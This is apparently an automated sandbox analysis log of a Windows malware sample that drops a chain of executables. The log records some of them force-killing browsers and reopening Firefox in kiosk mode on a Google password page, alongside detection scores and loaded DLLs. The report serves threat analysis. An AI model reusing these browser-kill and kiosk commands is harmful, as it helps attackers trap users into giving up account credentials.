Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe, 00000000.00000003.1681717879.0000000005A2A000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2454611051.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2455187968.000000000528A000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2586578333.000000000586A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 52%
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe String found in binary or memory: 3The file %s is missing. Please, re-install this application
Source: EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe "C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe "C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe"
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe "C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe "C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe "C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe "C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe "C:\Users\user\AppData\Local\Temp\1002779001\num.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2232 -prefMapHandle 2228 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70149f39-4644-4285-b4ad-18afc232e38d} 7860 "\\.\pipe\gecko-crash-server-pipe.7860" 1c164c71110 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe "C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1632 -parentBuildID 20230927232528 -prefsHandle 1484 -prefMapHandle 3904 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33f69ba0-f69f-45b7-b28b-3edde4189f95} 7860 "\\.\pipe\gecko-crash-server-pipe.7860" 1c176eb0a10 rdd
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe "C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe "C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe "C:\Users\user\AppData\Local\Temp\1002779001\num.exe"
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe "C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2316 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2188 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e1a6159-709e-4015-91b7-c27852cbfe8d} 7920 "\\.\pipe\gecko-crash-server-pipe.7920" 1d594569d10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4516 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 4476 -prefMapHandle 4520 -prefsLen 32092 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {772a86bb-9c44-49fb-b5c4-a3def5e3b247} 7920 "\\.\pipe\gecko-crash-server-pipe.7920" 1d5a7886d10 utility
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe "C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe "C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe"
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe "C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe "C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe "C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe "C:\Users\user\AppData\Local\Temp\1002779001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe "C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe"
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process created: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe "C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2232 -prefMapHandle 2228 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {70149f39-4644-4285-b4ad-18afc232e38d} 7860 "\\.\pipe\gecko-crash-server-pipe.7860" 1c164c71110 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1632 -parentBuildID 20230927232528 -prefsHandle 1484 -prefMapHandle 3904 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {33f69ba0-f69f-45b7-b28b-3edde4189f95} 7860 "\\.\pipe\gecko-crash-server-pipe.7860" 1c176eb0a10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2316 -parentBuildID 20230927232528 -prefsHandle 2260 -prefMapHandle 2188 -prefsLen 25416 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3e1a6159-709e-4015-91b7-c27852cbfe8d} 7920 "\\.\pipe\gecko-crash-server-pipe.7920" 1d594569d10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4516 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 4476 -prefMapHandle 4520 -prefsLen 32092 -prefMapSize 238769 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {772a86bb-9c44-49fb-b5c4-a3def5e3b247} 7920 "\\.\pipe\gecko-crash-server-pipe.7920" 1d5a7886d10 utility
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Section loaded: sppc.dll
